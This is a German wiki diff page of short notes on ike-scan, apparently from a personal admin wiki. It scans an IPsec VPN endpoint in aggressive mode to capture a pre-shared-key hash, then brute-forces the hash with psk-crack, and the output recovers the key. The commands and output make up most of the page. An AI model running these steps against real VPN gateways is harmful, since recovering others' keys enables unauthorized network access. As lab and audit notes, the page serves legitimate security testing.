Ike-scan: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
Thomas (Diskussion | Beiträge) (→Guide) |
Thomas (Diskussion | Beiträge) |
||
| (4 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt) | |||
| Zeile 1: | Zeile 1: | ||
| + | =Szenario= | ||
| + | *[[strongswan zu strongswan aggressive modus|vpn aggressive modus]] | ||
| + | |||
=Install= | =Install= | ||
*apt-get install ike-scan | *apt-get install ike-scan | ||
| + | =Scan= | ||
| + | *ike-scan -A 10.84.252.32 -Pike.key | ||
| + | <pre> | ||
| + | Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) | ||
| + | 10.84.252.32 Aggressive Mode Handshake returned HDR=(CKY-R=653dfd98f52029b0) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_IPV4_ADDR, Value=10.84.252.32) Hash(20 bytes) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) | ||
| + | |||
| + | Ending ike-scan 1.9.4: 1 hosts scanned in 0.046 seconds (21.84 hosts/sec). 1 returned handshake; 0 returned notify | ||
| + | </pre> | ||
| + | =Hack= | ||
| + | *psk-crack -b 5 ike.key | ||
| + | <pre> | ||
| + | Starting psk-crack [ike-scan 1.9.4] (http://www.nta-monitor.com/tools/ike-scan/) | ||
| + | Running in brute-force cracking mode | ||
| + | Brute force with 36 chars up to length 5 will take up to 60466176 iterations | ||
| + | key "tina" matches SHA1 hash 2b71fba7f075ba64027852360147ea220c7b9942 | ||
| + | Ending psk-crack: 497046 iterations in 0.992 seconds (501032.72 iterations/sec) | ||
| + | </pre> | ||
=Guide= | =Guide= | ||
*http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide | *http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide | ||
Aktuelle Version vom 9. November 2017, 10:03 Uhr
Szenario
Install
- apt-get install ike-scan
Scan
- ike-scan -A 10.84.252.32 -Pike.key
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 10.84.252.32 Aggressive Mode Handshake returned HDR=(CKY-R=653dfd98f52029b0) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_IPV4_ADDR, Value=10.84.252.32) Hash(20 bytes) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Ending ike-scan 1.9.4: 1 hosts scanned in 0.046 seconds (21.84 hosts/sec). 1 returned handshake; 0 returned notify
Hack
- psk-crack -b 5 ike.key
Starting psk-crack [ike-scan 1.9.4] (http://www.nta-monitor.com/tools/ike-scan/) Running in brute-force cracking mode Brute force with 36 chars up to length 5 will take up to 60466176 iterations key "tina" matches SHA1 hash 2b71fba7f075ba64027852360147ea220c7b9942 Ending psk-crack: 497046 iterations in 0.992 seconds (501032.72 iterations/sec)